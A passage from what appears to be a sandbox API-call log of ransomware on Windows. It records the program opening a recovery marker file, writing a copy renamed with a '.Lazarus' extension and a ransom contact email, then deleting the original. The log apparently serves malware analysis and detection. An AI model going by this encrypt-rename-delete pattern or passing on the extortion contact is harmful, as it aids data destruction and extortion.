nFileSizeLow=0x0, dwReserved0=0x23, dwReserved1=0x202e4, cFileName="8", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧襐\x07̧비聐蝰\x08賂̧")) returned 0 [0060.890] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0060.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0060.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0060.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0060.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0060.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.891] AreFileApisANSI () returned 1 [0060.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 34 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.891] AreFileApisANSI () returned 1 [0060.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68b80 [0060.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.891] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0060.892] GetFileType (hFile=0x418) returned 0x1 [0060.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0060.892] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.892] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.892] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.892] CloseHandle (hObject=0x418) returned 1 [0060.892] AreFileApisANSI () returned 1 [0060.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69210 [0060.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.892] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0060.893] GetFileType (hFile=0x418) returned 0x1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0060.893] CloseHandle (hObject=0x418) returned 1 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.893] AreFileApisANSI () returned 1 [0060.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x690d0 [0060.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.893] GetFileAttributesExW (in: lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0060.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.894] AreFileApisANSI () returned 1 [0060.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.894] GetLastError () returned 0x0 [0060.894] SetLastError (dwErrCode=0x0) [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x83fb0 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0060.894] GetLastError () returned 0x0 [0060.894] SetLastError (dwErrCode=0x0) [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0060.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.894] AreFileApisANSI () returned 1 [0060.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0060.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0060.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=96 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 96 [0060.895] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$winre_backup_partition.marker.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0060.896] GetFileType (hFile=0x418) returned 0x1 [0060.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.897] AreFileApisANSI () returned 1 [0060.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0060.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.897] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.897] GetFileType (hFile=0x424) returned 0x1 [0060.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.897] GetLastError () returned 0x0 [0060.897] SetLastError (dwErrCode=0x0) [0060.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.897] GetLastError () returned 0x0 [0060.897] SetLastError (dwErrCode=0x0) [0060.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x851c8 [0060.898] ReadFile (in: hFile=0x424, lpBuffer=0x851c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x851c8*, lpNumberOfBytesRead=0x327f030*=0x0, lpOverlapped=0x0) returned 1 [0060.898] GetLastError () returned 0x0 [0060.898] SetLastError (dwErrCode=0x0) [0060.898] GetLastError () returned 0x0 [0060.898] SetLastError (dwErrCode=0x0) [0060.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0060.898] CloseHandle (hObject=0x418) returned 1 [0060.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c8 | out: hHeap=0x20000) returned 1 [0060.898] CloseHandle (hObject=0x424) returned 1 [0060.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.899] AreFileApisANSI () returned 1 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69210 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.899] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.899] GetLastError () returned 0x5 [0060.899] GetLastError () returned 0x5 [0060.899] SetLastError (dwErrCode=0x5) [0060.899] GetLastError () returned 0x5 [0060.899] SetLastError (dwErrCode=0x5) [0060.899] GetLastError () returned 0x5 [0060.899] SetLastError (dwErrCode=0x5) [0060.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0060.899] GetLastError () returned 0x5 [0060.899] SetLastError (dwErrCode=0x5) [0060.899] AreFileApisANSI () returned 1 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68d60 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.899] DeleteFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker")) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.900] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.900] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x23, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.901] AreFileApisANSI () returned 1 [0060.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 